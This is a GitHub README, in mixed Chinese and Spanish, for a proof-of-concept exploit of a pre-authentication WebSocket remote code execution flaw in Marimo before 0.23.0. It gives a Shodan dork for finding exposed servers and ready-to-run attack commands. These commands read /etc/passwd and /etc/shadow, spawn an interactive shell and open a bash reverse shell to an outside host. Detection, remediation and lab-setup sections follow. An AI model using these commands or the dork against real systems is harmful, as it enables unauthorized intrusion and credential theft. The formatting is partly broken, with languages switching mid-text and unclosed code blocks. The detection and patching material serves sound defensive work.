fevar54/marimo_CVE-2026-39987_RCE_PoC
GitHub: fevar54/marimo_CVE-2026-39987_RCE_PoC
针对 Marimo < 0.23.0 的预认证 WebSocket RCE 漏洞提供 PoC 脚本与利用方案。
Stars: 0 | Forks: 0
# CVE-2026-39987 - Marimo < 0.23.0 预认证 RCE (WebSocket)
## ⚠️ 法律警告 ⚠️
## 📋 描述
低于 0.23.0 版本的 Marimo 存在一个严重的无需预先认证的远程代码执行 (RCE) 漏洞。端点 `/terminal/ws` 没有实施适当的访问控制,允许未经身份验证的攻击者在系统中获取完整的交互式 shell。
| 详情 | 信息 |
|---------|-------------|
| **CVE** | CVE-2026-39987 |
| **严重程度** | 严重 |
| **CVSS Score** | 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) |
| **类型** | 预认证远程代码执行 (RCE) |
| **向量** | WebSocket (`/terminal/ws`) |
| **受影响产品** | Marimo < 0.23.0 |
| **补丁** | Marimo ≥ 0.23.0 |
## 🎯 影响
- ✅ 无需认证的远程命令执行
- ✅ 完整的交互式 PTY shell
- ✅ 完全控制系统
- ✅ 访问敏感数据
- ✅ 可能的网络横向移动
## 🔍 识别
### Shodan Dork
http.favicon.hash:-1864630356
text
### 指纹
- Favicon hash: `-1864630356`
- 端点版本: `/api/version`
## 💀 漏洞利用 PoC
### 前置条件
```
pip install websockets requests
Uso Básico
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
Ejemplos
bash
# 获取系统信息
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"
# 读取敏感文件
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"
# Reverse shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
# 交互式 shell
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ Detección (Seguro)
Script de detección pasiva
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei Template
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987
info:
name: Marimo < 0.23.0 Pre-Auth RCE
severity: critical
# ... (template completo incluido)
🔧 Remediation
Inmediata
DESCONECTAR el sistema de la red si está expuesto
Bloquear acceso al puerto donde corre Marimo
Revisar logs en busca de actividad sospechosa
Permanente
bash
# 升级到已修补版本
pip install --upgrade marimo>=0.23.0
# 验证版本
marimo --version
# 若公开暴露则配置身份验证
# 切勿将 'marimo edit' 直接暴露到 internet
Docker (Entorno vulnerable)
bash
# 运行易受攻击的版本进行测试
docker run -p 8080:8080 marimo-team/marimo:0.22.0
# 验证漏洞
python CVE-2026-39987_detector.py http://localhost:8080
# Exploit
python CVE-2026-39987_PoC.py http://localhost:8080 "id"
GitHub Security Advisory
NVD Entry
Pull Request #9098
Marimo Documentation
👥 Créditos
Descubrimiento: [Nombre del investigador]
PoC Desarrollo: [Tu nombre]
Parche: Marimo Team
📜 Licencia
Este proyecto es solo para fines educativos. El uso de este software es bajo tu propio riesgo.
⭐ Si este README te fue útil, considera darle una estrella al repositorio.
⚠️ RECUERDA: CON GRAN PODER VIENE GRAN RESPONSABILIDAD
```
标签:PoC, WebSocket, 依赖分析, 暴力破解, 未授权访问, 漏洞利用, 编程工具, 远程代码执行